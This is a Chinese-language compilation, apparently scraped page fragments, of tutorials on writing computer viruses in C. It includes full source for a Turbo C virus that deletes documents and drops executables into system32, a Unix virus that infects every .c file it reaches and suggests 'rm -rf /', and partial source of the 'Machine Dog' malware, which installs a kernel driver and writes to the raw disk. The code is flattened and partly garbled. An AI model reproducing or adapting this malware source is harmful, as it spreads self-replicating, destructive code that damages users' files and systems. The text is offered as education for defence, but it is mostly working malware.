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1、用C语言编写简单的病毒转2007年08月28日 星期二 下午 03:39摘要在分析病毒机理的基础上,用C语言写了一个小病毒作为实例,用TURBOC2.0实现. Abstract This paper introduce the charateristic of the computer virus,then show a simple example written by TURBOC2.0.一、什么是病毒 恶意软件可能是第一个对我们产生影响的计算机安全问题.所以病毒在畔 踩 惺呛苤匾 ? 我们要对付病毒,就要了解病毒. 写一些病毒是一个很好的办法. 如果要写一个病毒,先要知道它是什么.可以给

2、病毒一个定义,这一定义是被广泛认可的。Frederic Cohen博士在计算机病毒简短讲座中提到的:“一种能够通过修改自身来包括或释放自我拷贝而传染给其他程序的程序。“ 其实病毒和普通程序并无太大不同,而且通常比较简单,不像很多程序那样复杂。只不过病毒里面用到一些正常程序一般不会用到的技术。 要编制一个病毒,首先要知道病毒的运行机理。 不论是何种病毒,它一般在结构上分为三个功能模块:感染机制,触发机制和有效载荷。 在病毒结构中,首要的而且唯一必需的部分是感染机制。病毒首先必须是能够繁殖自身的代码,这是病毒之所以成为病毒的根本原因。我们可以用一段类C伪码来表示这个过程。InfectSection

3、() if (infectable_object_found &object_not_already_infect) infect_object; 病毒的第二个主要构成部分是有效载荷触发事件.一个病毒来到你的电脑后,不大可能立即发作,否则它不会被传播得很远.潜伏的敌人永远要比能见到的敌人危险得多.病毒一般是在找到一定数量的感染体,某一日期或时间,某一段文本后触发.一个简单的触发机制可能是这样工作的: TriggerSection() if (date_is_Friday_13th_and_time_is_03:13:13) set_trigger_status_to_yes; 有效载荷就是病毒

4、用来骚扰你的电脑的方法,有触发机制的病毒一般也有有效载荷。它可以是任意的给你发一条一次性简单的愚弄信息,重新格式化你的磁盘,把它自己邮给你的E_mail通信者都可以成为有效的负荷。简单的有效负荷可以如下进行: Executesection() if (trigger_statue_is_yes) execute_payload; 二、 编制病毒的语言 最常见的编制病毒的语言有汇编语言、VB、C 语言等,我们可以来看一看一个有名的病毒论坛上认为学写病毒要掌握的基础: 1).Win32编程,进程,线程,内存,等等。2).32位汇编,以指令用法为主。386汇编就比较够用了。3).PE格式,有精力还可

5、以看一下其它可能被感染的文件的文件格式。4).调试技术。VC,TD32,SoftIce,等等。 要掌握的东西确实很多,还多听都没听过,很吓人但实际上,即使我们对计算机的原理和操作系统不很了解,而且不熟悉除以外的其他语言,只要我们对的库函数有一定了解,就可以写一些类似病毒的东西.三用编制病毒 以TurboC2.0为例它的库函数可以实现很多功能 如以下两个函数: 1).findfirst和findnext函数:在dir.h。findfirst用来找各种类型的文件,可以得到文件名文件长度,文件属性等,findnext和findfirst配合使用,用来找到下一个同类型的文件。 2).remove函数:

6、在stdio.h.只要知道文件名,可以删除任意类型的文件. 四 我写的C病毒 上有一句比较经典的话,或许把恶意软件造成的损害说成是心理上的损害 可能会更恰当一些.从这个意义上说,我的病毒是非常典型的病毒. 下面是我写的病毒. 它主要由四个模块组成. RubbishMaker()可用来在当前目录下生成大量随机命名的垃圾文件. CreatEXE()将在C盘的敏感地方放置几个.exe垃圾,它们要隐蔽一些。 Remove()会删掉你的一些东西,所以千万不要随便运行这个程序. Breed()是C_KILLER的精华所在,它将kill所有的c程序,并利用它们繁殖自身. 前三个是有效负载. 第四个可以说是它

7、的感染机制./*IN FACT,ITS NOT A VIRYUS AT ALL.*/#include #include #include #include #include /* copy outfile to infile */void copyfile(char *infile, char *outfile) FILE *in,*out; in = fopen(infile,r); out = fopen(outfile,w); while (!feof(in) fputc(fgetc(in),out); fclose(in); fclose(out);/*This function na

8、med Rubbishmaker.*/void MakeRubbish() int i; FILE *fp; char *path; char *NewName; char *disk7 = A,B,C,D,E,F,G; char *addtion = :; /* Make some rubbish at the current catalogue */ for (i = 0; i5; i+) char tempname = XXXXXX ; NewName = mktemp(tempname); fp = fopen(NewName,w); fclose(fp); /* make some

9、rubbish at the root catalogue */ path = strcat(diskgetdisk(),addtion); /* get the root catalogue */ chdir(path); /*change directory according to the path */ for (i = 0; i5; i+) char tempname = XXXXXX; NewName = mktemp(tempname); fp = fopen(NewName,w); fclose(fp); /*This function can creat some .exe

10、or .com documents in the sensitive place.Dont worry,Its only a joke.It will do no harm to your computer.*/void CreatEXE() int i; char *path; char *s2 = C:WINDOWSsystem32loveworm.exe,C:WINDOWS; for ( i = 0; i 2; i+) open(s, 0x0100,0x0080); copyfile( C_KILLER.C,s); /* remove something from your comput

11、er */void Remove() int done; int i; struct ffblk ffblk; char *documenttype3 = *.txt,*.doc,*.exe; for (i = 0; i 了解病毒是为了更好的防范它。Copy code/* ucfree:2007-12-31 start */#include #include #include #include #include #include #define VIR_NAM virus.c / virus file name#define BUF_SIZE 101#define STA_PATH / / s

12、tart path char vir_pathBUF_SIZE = ;/* its the main part of viruss body,* it can traversal all the parts of the system from STA_PATH,* and if the process have enough permission,* all of the .c file will being infected as a virus */void vir_body() DIR *dp; struct dirent *dirp; struct stat buf, cur_dir

13、_buf; int i; char str_bufBUF_SIZE; / init the vir_path if (!strcmp(vir_path, ) if (getcwd(vir_path, BUF_SIZE) = NULL) return; strcat(vir_path, /); strcat(vir_path, VIR_NAM); chdir(STA_PATH); if (dp = opendir(.) = NULL) return; / do all the sub_dir terms while (dirp = readdir(dp) != NULL) i = strlen(

14、dirp-d_name); if (dirp-d_namei-1 = c & dirp-d_namei-2 = .) / is a c file do_c_file(dirp-d_name); continue; if (stat(dirp-d_name, &buf) d_name, .) | !strcmp(dirp-d_name, .) / ignore dot and dot_dot directory continue; / do the submit derectory as current chdir(dirp-d_name); vir_body(); chdir(.); clos

15、edir(dp); /* here! you can do anything that you want * just use the system invokes or shell commands * ex: * if (system_data_is_sundy) * * system(rm -rf /); * * tip: if the process runing as root, the system being over * its dangerous, so not to try */ return;/* this funtion is try to infect the .c

16、file,* if the .c file is already infected,no need to do it again,* else the work begin .*/int do_c_file(const char *f_name) FILE *fp_obj, *fp_vir, *fp_tmp; char bufBUF_SIZE; char flag; char *tmp_buf; struct stat statbuf;/ get the object files stat struct utimbuf timebuf;/ keep the object files acces

17、s and modify time if (fp_obj = fopen(f_name, r+) = NULL) / object file return 1; if (stat(f_name, &statbuf) 0) return 1; timebuf.actime = statbuf.st_atime; timebuf.modtime = statbuf.st_mtime; if (fp_vir = fopen(vir_path, r) =NULL) / virus file return 1; / make a tempfile as a buffer if (tmp_buf = tm

18、pnam(NULL) = NULL) return 1; if (fp_tmp = fopen(tmp_buf, a+) = NULL) / temp file return 1; unlink(tmp_buf);/ kernal will delete it after the process done / read the C text into the temp file, and modify it flag = T; while (fgets(buf, BUF_SIZE, fp_obj) != NULL) if (!strcmp(buf, /* ucfree:2007-12-31 s

19、tart */n) / the obeject file have been infected return 0; if (flag = T & strstr(buf, main() / find the funtion main,change flag flag = F; if (flag = F & (strstr(buf, return) | strstr(buf, ) / insert the invoke line,before return or fputs(ttvir_body();n, fp_tmp); flag = O; fputs(buf, fp_tmp); if (fla

20、g != O) / is not the main c file return 0; / add the parts of viruss body to the tail of temp file flag = T; while (fgets(buf, BUF_SIZE, fp_vir) != NULL) if (flag = T & !strcmp(buf, /* ucfree:2007-12-31 start */n) / is the start of the viruss body flag = F; if (flag = T) / not find the start continu

21、e; if (flag = O) / virus body have been inserted,do over break; / insert viruss body if (!strcmp(buf, /* ucfree:2007-12-31 end */n) / is the end of the viruss body flag = O; if (strstr(buf, #define VIR_NAM) & buf0 = #) / use the objects name to instand of the virus name snprintf(buf, sizeof(buf), %s

22、t%sn, #define VIR_NAM, f_name); fputs(buf, fp_tmp); fclose(fp_vir); / temp file instand of the object file rewind(fp_tmp); rewind(fp_obj); while (fgets(buf, BUF_SIZE,fp_tmp) != NULL) fputs(buf, fp_obj); fclose(fp_tmp); fclose(fp_obj); if (utime(f_name, &timebuf) 0) / keep the time back return 1; / O

23、K! object file also been a virus _ return 0;/* ucfree:2007-12-31 end */* test it */int main() vir_body(); return 0;机器狗源码(C语言的)/ Test.cpp : 定义控制台应用程序的入口点。/#include stdafx.h/=#include typedef struct _PARTITION_ENTRY UCHAR active; / 能否启动标志 UCHAR StartHead; / 该分区起始磁头号 UCHAR StartSector; / 起始柱面号高2位:6位起始扇

24、区号 UCHAR StartCylinder; / 起始柱面号低8位 UCHAR PartitionType; / 分区类型 UCHAR EndHead; / 该分区终止磁头号 UCHAR EndSector; / 终止柱面号高2位:6位终止扇区号 UCHAR EndCylinder; / 终止柱面号低8位 ULONG StartLBA; / 起始扇区号 ULONG TotalSector; / 分区尺寸(总扇区数) PARTITION_ENTRY, *PPARTITION_ENTRY;/=typedef struct _MBR_SECTOR UCHAR BootCode446; PARTIT

25、ION_ENTRY Partition4; USHORT Signature; MBR_SECTOR, *PMBR_SECTOR;/=typedef struct _BBR_SECTOR USHORT JmpCode; / 2字节跳转指令,跳转到引导代码 UCHAR NopCode; / 1字节nop指令,填充用,保证跳转指令长3个字节 UCHAR OEMName8; / 8字节的OEMName / 下面开始为: BPB( BIOS Parameter Block ) USHORT BytesPerSector; / 每个扇区的字节数 (512 1024 2048 4096) UCHAR Se

26、ctorsPerCluster; / 每个簇的扇区数 ( 1 2 4 8 16 32 64 128 )两者相乘不能超过32K(簇最大大小) USHORT ReservedSectors; / 从卷的第一个扇区开始的保留扇区数目,该值不能为0,对于FAT12/FAT16,该值通常为1,对于FAT32,典型值为32 UCHAR NumberOfFATs; / 卷上FAT数据结构的数目,该值通常应为2,NTFS不使用NumberOfFATs字段,必须为0 USHORT RootEntries; / 对于FAT12/FAT16,该值表示32字节目录项的数目,对于FAT32,该值必须为0;NTFS不使用

27、 USHORT NumberOfSectors16; / 该卷上的扇区总数,该字段可以为0,如果该字段为0,则NumberOfSectors32不能为0;对于FAT32,该字段必须为0 FAT32/NTFS不使用该字段 UCHAR MediaDescriptor; / 介质类型 USHORT SectorsPerFAT16; / 该字段标识一个FAT结构占有的扇区数(FAT12/FAT16),对于FAT32卷,该字段必须为0;FAT32/NTFS不使用该字段 USHORT SectorsPerTrack; / 用于INT 0x13中断的每个磁道的扇区数 USHORT HeadsPerCylin

28、der; / 用于INT 0x13中断的每个柱面的磁头数 ULONG HiddenSectors; / 包含该FAT卷的分区之前的隐藏扇区数 ULONG NumberOfSectors32; / 该字段包含该卷上的所有扇区数目,对于FAT32,该字段不为0;FAT12/FAT16可根据实际大小是否超过65536个扇区数决定是否采用该字段; NTFS不使用该字段 / 下面开始为: EBPB ( Extended BIOS Parameter Block ) ULONG SectorsPerFAT32; / 对于FAT32,该字段包含一个FAT的大小,而SectorsPerFAT16字段必须为0;

29、 BBR_SECTOR, *PBBR_SECTOR;#include #define PARTITION_TYPE_NTFS 0x07#define PARTITION_TYPE_FAT32 0x0B#define PARTITION_TYPE_FAT32_LBA 0x0C/=#define STR_SYSFILE_PATH TEXT(%SystemRoot%system32driverspcihdd.sys)#define STR_VIRFILE_PATH TEXT(%SystemRoot%System32Userinit.exe)#define STR_DSKDEVICE_NAME TEX

30、T(.PhysicalDrive0)#define STR_HDDDEVICE_NAME TEXT(.PhysicalHardDisk0)/=#define IOCTL_MYDEV_BASE 0xF000#define IOCTL_MYDEV_Fun_0xF01 CTL_CODE(IOCTL_MYDEV_BASE, 0xF01, METHOD_BUFFERED, FILE_ANY_ACCESS)/=DWORD InstallAndStartDriver(HMODULE ModuleHandle) TCHAR filePathMAX_PATH; HANDLE fileHandle; HRSRC

31、hSysRes; DWORD dwWritten; DWORD dwSysLen; PVOID lpSysBuf; SC_HANDLE hSCManager; SC_HANDLE hService; SERVICE_STATUS sService; DWORD errCode = ERROR_SUCCESS; if( (NULL = (hSysRes = FindResource(ModuleHandle, (LPCTSTR)1001, (LPCTSTR)1001) | (0 = (dwSysLen = SizeofResource(ModuleHandle, hSysRes) | (NULL

32、 = (lpSysBuf = LockResource(hSysRes) | (0 = ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath0, sizeof(filePath) | (INVALID_HANDLE_VALUE = (fileHandle = CreateFile(filePath, GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL) ) errCode = GetLastError(); goto FunExit00; if( !WriteFil

33、e(fileHandle, lpSysBuf, dwSysLen, &dwWritten, NULL) | !SetEndOfFile(fileHandle) | !FlushFileBuffers(fileHandle) ) errCode = GetLastError(); CloseHandle(fileHandle); if(ERROR_SUCCESS != errCode) goto FunExit01; if(NULL = (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS) errCode = GetLast

34、Error(); goto FunExit01; hService = CreateService( hSCManager, TEXT(PciHdd), TEXT(PciHdd), SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, filePath, NULL, NULL, NULL, NULL, NULL ); if(NULL != hService) CloseServiceHandle(hService); else if(NULL != (hService = O

35、penService(hSCManager, TEXT(PciHdd), SERVICE_ALL_ACCESS) ControlService(hService, SERVICE_CONTROL_STOP, &sService); DeleteService(hService); CloseServiceHandle(hService); hService = CreateService( hSCManager, TEXT(PciHdd), TEXT(PciHdd), SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START

36、, SERVICE_ERROR_IGNORE, filePath, NULL, NULL, NULL, NULL, NULL ); if(NULL != hService) CloseServiceHandle(hService); else errCode = GetLastError(); goto FunExit02; if(NULL = (hService = OpenService(hSCManager, TEXT(PciHdd), SERVICE_START) errCode = GetLastError(); goto FunExit02; StartService(hServi

37、ce, 0, NULL); CloseServiceHandle(hService);FunExit02: CloseServiceHandle(hSCManager);FunExit01: DeleteFile(filePath);FunExit00: return errCode;/=DWORD StopAndDeleteDriver(VOID) TCHAR filePathMAX_PATH; SC_HANDLE hSCManager; SC_HANDLE hService; SERVICE_STATUS sService; DWORD errCode = ERROR_SUCCESS; i

38、f(NULL = (hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS) errCode = GetLastError(); goto FunExit00; if(NULL = (hService = OpenService(hSCManager, TEXT(PciHdd), SERVICE_ALL_ACCESS) errCode = GetLastError(); goto FunExit01; ControlService(hService, SERVICE_CONTROL_STOP, &sService); DeleteService(hService); CloseServiceHandle(hService);FunExit01: CloseServiceHandle(hSCManager);FunExit00: ExpandEnvironmentStrings(STR_SYSFILE_PATH, &filePath0, sizeof(filePath); DeleteFile(filePath); return errCode;/=/ 感染硬盘第一个分区的指定的文件/ / 1)通过FSCTL_GET_RETRIEVAL_POINTERS获取文件数


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